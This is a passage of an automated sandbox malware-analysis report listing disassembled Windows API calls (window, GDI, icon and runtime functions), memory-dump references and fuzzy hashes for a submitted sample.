                                                                                                • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 642888154-0
                                                                                                • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Variant$Copy$ClearErrorLast
                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                • API String ID: 2487901850-572801152
                                                                                                • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 1871949834-0
                                                                                                • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                APIs
                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                • SendMessageW.USER32 ref: 00471AE3
                                                                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                • String ID:
                                                                                                • API String ID: 3611059338-0
                                                                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                • String ID:
                                                                                                • API String ID: 1640429340-0
                                                                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                APIs
                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                • _wcslen.LIBCMT ref: 004438CD
                                                                                                • _wcslen.LIBCMT ref: 004438E6
                                                                                                • _wcstok.LIBCMT ref: 004438F8
                                                                                                • _wcslen.LIBCMT ref: 0044390C
                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                • _wcstok.LIBCMT ref: 00443931
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 3632110297-0
                                                                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 752480666-0
                                                                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                • String ID:
                                                                                                • API String ID: 3275902921-0
                                                                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                • String ID:
                                                                                                • API String ID: 3275902921-0
                                                                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                • String ID:
                                                                                                • API String ID: 2833360925-0
                                                                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 004555C7
                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3691411573-0
                                                                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                APIs
                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                • EndPath.GDI32(?), ref: 004472D6
                                                                                                • StrokePath.GDI32(?), ref: 004472E4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                • String ID:
                                                                                                • API String ID: 372113273-0
                                                                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDevice$Release
                                                                                                • String ID:
                                                                                                • API String ID: 1035833867-0
                                                                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                APIs
                                                                                                • __getptd.LIBCMT ref: 0041708E
                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                • __lock.LIBCMT ref: 004170BE
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                • _free.LIBCMT ref: 004170EE
                                                                                                • InterlockedIncrement.KERNEL32(00952D90), ref: 00417106
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                • String ID:
                                                                                                • API String ID: 3470314060-0
